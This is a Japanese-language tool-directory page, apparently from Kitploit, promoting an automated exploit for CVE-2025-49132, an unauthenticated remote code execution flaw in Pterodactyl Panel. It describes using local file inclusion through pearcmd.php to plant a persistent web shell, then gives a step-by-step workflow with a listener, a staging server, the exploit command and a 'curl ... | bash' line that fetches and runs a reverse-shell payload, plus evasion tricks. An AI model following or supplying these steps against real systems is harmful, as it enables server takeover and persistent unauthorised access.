Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-49132-Mods — Pterodactyl Panelの重大な未認証RCEであるCVE-2025-49132用の自動化エクスプロイト。ロケールエンドポイントを介したLFIを利用して、永続的なWebシェルを展開し、リバースシェルアクセスを実現します。 | Kitploit
ツール/GitHubGitHub/malw0re/cve-2025-49132-mods
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubmalw0re/cve-2025-49132-mods

CVE-2025-49132-Mods

Pterodactyl Panelの重大な未認証RCEであるCVE-2025-49132用の自動化エクスプロイト。ロケールエンドポイントを介したLFIを利用して、永続的なWebシェルを展開し、リバースシェルアクセスを実現します。

リポジトリを見る
122496ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-49132 - RCE シンプル

Python CVE

📝 概要

このリポジトリには、Pterodactyl パネル(v1.11.11 より前)における重大な未認証のリモートコード実行(RCE)脆弱性である CVE-2025-49132 用の専用エクスプロイトが含まれています。

この脆弱性は /locales/locale.json エンドポイントに存在します。locale および namespace クエリパラメータを操作することで、攻撃者は Local File Inclusion(LFI)を利用して pearcmd.php とやり取りできます。これにより、任意のファイル作成とコマンド実行が可能になり、システム全体が侵害されます。

⚙️ エクスプロイトチェーン

ape.py スクリプトは以下の手順を自動化します:

PEAR ディスカバリ:対象のディレクトリ構造をファジングして、PEAR のインストール場所を特定します。

バックドア作成:PEAR の config-create を使用して、永続的な Web シェルを /tmp/shell.php に書き込みます。

🚀 使用方法

ターゲット上でコールバックを成功させるには、次のワークフローに従ってください:

  1. 準備 リスナー:別のターミナルで Penelope(またはお好みのリスナー)を起動します:

penelope -p 4444

ステージングサーバー:カスタムシェルスクリプトを使用する場合は、Python でホストします: python3 -m http.server 8080

  1. 実行 インタラクティブモードでスクリプトを実行し、エクスプロイト処理の制御を維持します:

python3 ape.py --host xxx.xxx.xxx --interactive

  1. シェルの取得 shell> プロンプト内で、次のコマンドを使用してステージングしたペイロードを実行します:

shell> curl http://<YOUR_IP>:8080/shell.sh | bash

🛡️ 技術的保護対策

スペース回避:自動的に ${IFS} を使用して、ペイロードが URL 解析を生き残るようにします。

Base64 ラッパー:リバースシェルコマンドを Base64 でラップして、対象の Nginx/Web サーバーによる文字化けを防ぎます。

タイムアウト処理:Web リクエストがハングした場合でも、リバースシェルが正常に接続されたことを検出するように設計されています。

ツールをダウンロード